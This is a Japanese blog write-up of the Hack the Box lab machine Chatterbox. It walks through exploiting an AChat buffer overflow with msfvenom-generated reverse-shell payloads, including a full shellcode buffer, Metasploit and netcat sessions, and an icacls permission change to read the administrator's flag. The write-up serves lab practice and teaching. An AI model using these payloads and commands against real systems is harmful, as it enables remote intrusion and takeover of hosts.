【Hack the Box write-up】Chatterbox

June 16, 2020

はじめに

筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machine について

難易度は medium です

スクリーンショット 2020-06-15 2.46.10.png

nmap

# Nmap 7.80 scan initiated Sun Jun 14 13:42:21 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/AutoRecon/results/10.10.10.74/scans/_full_tcp_nmap.txt -oX /home/kali/AutoRecon/results/10.10.10.74/scans/xml/_full_tcp_nmap.xml 10.10.10.74
Nmap scan report for 10.10.10.74
Host is up, received user-set (0.25s latency).
Scanned at 2020-06-14 13:42:22 EDT for 4084s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT     STATE SERVICE REASON  VERSION
9255/tcp open  http    syn-ack AChat chat system httpd
|_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   syn-ack AChat chat system

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 14:50:26 2020 -- 1 IP address (1 host up) scanned in 4084.79 seconds

full スキャンしないとなんも出てこないです 9255 はブラウザで繋いでもなんも出てきませんでした。

searchsploit

kali@kali:~$ searchsploit achat
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow                                                                                                                                                        | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)                                                                                                                                           | exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                                                              | exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                                                                                                                                                                | exploits/php/webapps/24647.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

kali@kali:~$ searchsploit -p 36025
  Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/36025
     Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators

Copied EDB-ID #36025's path to the clipboard.

通るのかわかりませんがいったんこれを使うことにします https://www.exploit-db.com/exploits/36025

reverse shell を取ろうとしてみる

kali@kali:~$ msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp RHOST=10.10.10.74 LHOST=10.10.14.8 LPORT=1313 exitfunc=thread -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 850 (iteration=0)
x86/unicode_mixed chosen with final size 850
Payload size: 850 bytes
Final size of python file: 4137 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x39\x6c\x38\x68\x61\x72"
buf += b"\x4b\x50\x4b\x50\x4b\x50\x33\x30\x44\x49\x48\x65\x30"
buf += b"\x31\x37\x50\x62\x44\x64\x4b\x42\x30\x50\x30\x54\x4b"
buf += b"\x72\x32\x6c\x4c\x42\x6b\x4f\x62\x6a\x74\x54\x4b\x52"
buf += b"\x52\x6c\x68\x5a\x6f\x74\x77\x6e\x6a\x4f\x36\x70\x31"
buf += b"\x4b\x4f\x36\x4c\x4f\x4c\x70\x61\x43\x4c\x39\x72\x4e"
buf += b"\x4c\x4d\x50\x76\x61\x38\x4f\x5a\x6d\x4b\x51\x67\x57"
buf += b"\x6a\x42\x69\x62\x70\x52\x4e\x77\x62\x6b\x32\x32\x6e"
buf += b"\x30\x74\x4b\x4f\x5a\x4d\x6c\x64\x4b\x4e\x6c\x4c\x51"
buf += b"\x73\x48\x4b\x33\x70\x48\x4d\x31\x46\x71\x32\x31\x64"
buf += b"\x4b\x4f\x69\x6b\x70\x6d\x31\x6a\x33\x34\x4b\x6f\x59"
buf += b"\x6a\x78\x67\x73\x6e\x5a\x30\x49\x32\x6b\x6d\x64\x32"
buf += b"\x6b\x6d\x31\x66\x76\x70\x31\x59\x6f\x56\x4c\x35\x71"
buf += b"\x48\x4f\x4c\x4d\x5a\x61\x77\x57\x30\x38\x59\x50\x62"
buf += b"\x55\x4c\x36\x69\x73\x73\x4d\x6a\x58\x4d\x6b\x31\x6d"
buf += b"\x6c\x64\x50\x75\x69\x54\x6f\x68\x54\x4b\x52\x38\x4c"
buf += b"\x64\x59\x71\x76\x73\x51\x56\x74\x4b\x4a\x6c\x4e\x6b"
buf += b"\x52\x6b\x61\x48\x4d\x4c\x4b\x51\x38\x53\x72\x6b\x7a"
buf += b"\x64\x52\x6b\x4b\x51\x66\x70\x44\x49\x4d\x74\x4c\x64"
buf += b"\x4e\x44\x61\x4b\x4f\x6b\x30\x61\x4f\x69\x61\x4a\x62"
buf += b"\x31\x4b\x4f\x39\x50\x31\x4f\x31\x4f\x71\x4a\x54\x4b"
buf += b"\x5a\x72\x4a\x4b\x32\x6d\x51\x4d\x31\x58\x4e\x53\x30"
buf += b"\x32\x6d\x30\x4d\x30\x31\x58\x71\x67\x31\x63\x4f\x42"
buf += b"\x71\x4f\x4e\x74\x42\x48\x30\x4c\x32\x57\x6b\x76\x79"
buf += b"\x77\x75\x39\x49\x58\x69\x6f\x5a\x30\x34\x78\x52\x70"
buf += b"\x6d\x31\x69\x70\x69\x70\x4c\x69\x79\x34\x71\x44\x6e"
buf += b"\x70\x73\x38\x6f\x39\x33\x50\x32\x4b\x49\x70\x39\x6f"
buf += b"\x38\x55\x30\x6a\x6b\x5a\x6f\x78\x4a\x6a\x6a\x6a\x6a"
buf += b"\x6e\x7a\x68\x42\x48\x6c\x42\x69\x70\x4d\x35\x6f\x31"
buf += b"\x75\x39\x4b\x36\x30\x50\x52\x30\x50\x50\x62\x30\x71"
buf += b"\x30\x32\x30\x61\x30\x4e\x70\x33\x38\x47\x7a\x7a\x6f"
buf += b"\x57\x6f\x6b\x30\x6b\x4f\x76\x75\x73\x67\x62\x4a\x7a"
buf += b"\x70\x72\x36\x32\x37\x50\x68\x63\x69\x53\x75\x61\x64"
buf += b"\x50\x61\x6b\x4f\x6a\x35\x54\x45\x69\x30\x61\x64\x5a"
buf += b"\x6a\x59\x6f\x6e\x6e\x4d\x38\x51\x65\x48\x6c\x58\x68"
buf += b"\x33\x37\x4b\x50\x49\x70\x69\x70\x52\x4a\x6b\x50\x6f"
buf += b"\x7a\x4b\x54\x50\x56\x31\x47\x43\x38\x4a\x62\x69\x49"
buf += b"\x39\x38\x4f\x6f\x39\x6f\x69\x45\x64\x43\x59\x68\x6d"
buf += b"\x30\x63\x4e\x70\x36\x42\x6b\x70\x36\x70\x6a\x61\x30"
buf += b"\x51\x58\x39\x70\x6e\x30\x39\x70\x4d\x30\x62\x36\x50"
buf += b"\x6a\x69\x70\x32\x48\x6f\x68\x63\x74\x51\x43\x6b\x35"
buf += b"\x59\x6f\x78\x55\x33\x63\x62\x33\x32\x4a\x39\x70\x30"
buf += b"\x56\x62\x33\x70\x57\x43\x38\x4a\x62\x7a\x39\x39\x38"
buf += b"\x31\x4f\x4b\x4f\x56\x75\x71\x73\x7a\x58\x49\x70\x53"
buf += b"\x4d\x6b\x78\x51\x48\x42\x48\x49\x70\x6d\x70\x69\x70"
buf += b"\x69\x70\x30\x6a\x4b\x50\x62\x30\x43\x38\x5a\x6b\x4e"
buf += b"\x4f\x4a\x6f\x4c\x70\x39\x6f\x79\x45\x70\x57\x73\x38"
buf += b"\x32\x55\x50\x6e\x70\x4d\x61\x51\x79\x6f\x76\x75\x51"
buf += b"\x4e\x61\x4e\x59\x6f\x6a\x6c\x4b\x74\x4a\x6f\x61\x75"
buf += b"\x62\x50\x69\x6f\x4b\x4f\x39\x6f\x4b\x39\x43\x6b\x79"
buf += b"\x6f\x6b\x4f\x39\x6f\x79\x71\x65\x73\x4f\x39\x79\x36"
buf += b"\x62\x55\x56\x61\x78\x43\x55\x6b\x57\x70\x6d\x4d\x6b"
buf += b"\x7a\x4b\x5a\x43\x38\x45\x56\x76\x35\x57\x4d\x45\x4d"
buf += b"\x4b\x4f\x57\x65\x6f\x4c\x5a\x66\x43\x4c\x59\x7a\x51"
buf += b"\x70\x69\x6b\x4b\x30\x32\x55\x79\x75\x67\x4b\x61\x37"
buf += b"\x4c\x53\x74\x32\x52\x4f\x30\x6a\x4b\x50\x50\x53\x4b"
buf += b"\x4f\x79\x45\x41\x41"

出力された buf を 36025.py 内の buf と置き換えます

msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.8       yes       The listen address (an interface may be specified)
   LPORT     1212             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set lport 1313
lport => 1313
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.8:1313
[*] Sending stage (180291 bytes) to 10.10.10.74
[*] Meterpreter session 1 opened (10.10.14.8:1313 -> 10.10.10.74:49161) at 2020-06-14 14:47:27 -0400

meterpreter >
[*] 10.10.10.74 - Meterpreter session 1 closed.  Reason: Died

んー、一瞬繋がるんですけど即死しちゃいます。

まあ脆弱であることは確認できました、

windows/shellreversetcp を代わりに使ってみる

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4242 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

無事成功しました(windows/meterpreter/reverse_tcp は相性が悪かったのか…?

kali@kali:~$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.74] 49157
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

C:\Windows\system32>whoami
whoami
chatterbox\alfred

これで user.txt が取れます

PE

winPEAS とか色々みましたが有用そうな情報はパッと出てきませんでした。

root.txt のファイルの権限を確認します

C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

当然 Administrator のみが権限(フルアクセス)を持っています。

が、そもそも Desktop の権限をみてみると

C:\Users\Administrator\Desktop>cd ..
cd ..

C:\Users\Administrator>icacls Desktop
icacls Desktop
Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
        CHATTERBOX\Administrator:(I)(OI)(CI)(F)
        BUILTIN\Administrators:(I)(OI)(CI)(F)
        CHATTERBOX\Alfred:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files

Alfred も権限持ってますね なので Desktop 以下のファイルは権限の変更が可能です

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>icacls root.txt /grant alfred:F
icacls root.txt /grant alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

※権限に関して詳しくは https://docs.microsoft.com/ja-jp/windows-server/administration/windows-commands/icacls を参照

これで root.txt が取れます

終わりに

PE は簡単でしたが、shell とるのがかなり苦労しました… 良いマシンでした!

番外編

shell までの別ルート 1

windows/meterpreter/reverse_tcp はすぐ died してしまってましたが、別の方の writeup をみてみると AutoRunScript で post/windows/manage/migrate を走らせることですぐ別のプロセスに乗り移り、安定するようです

msf5 exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate
AutoRunScript => post/windows/manage/migrate
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.8:1313
[*] Sending stage (180291 bytes) to 10.10.10.74
[*] Meterpreter session 1 opened (10.10.14.8:1313 -> 10.10.10.74:49162) at 2020-06-15 20:26:44 -0400
[*] Session ID 1 (10.10.14.8:1313 -> 10.10.10.74:49162) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against CHATTERBOX
[*] Current server process: AChat.exe (4764)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 4636
[+] Successfully migrated into process 4636

meterpreter >

shell までの別ルート 2

windows/shell/reversetcpallports と metasploit を使う(nc だと失敗した(謎))

kali@kali:~$ msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp_allports  RHOST=10.10.10.74 LHOST=10.10.14.8 LPORT=1313 exitfunc=thread -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell/reverse_tcp_allports):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.8       yes       The listen address (an interface may be specified)
   LPORT     1313             yes       The starting port number to connect back on


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.8:1313
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.74
[*] Command shell session 3 opened (10.10.14.8:1313 -> 10.10.10.74:49165) at 2020-06-15 20:35:24 -0400

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
このエントリーをはてなブックマークに追加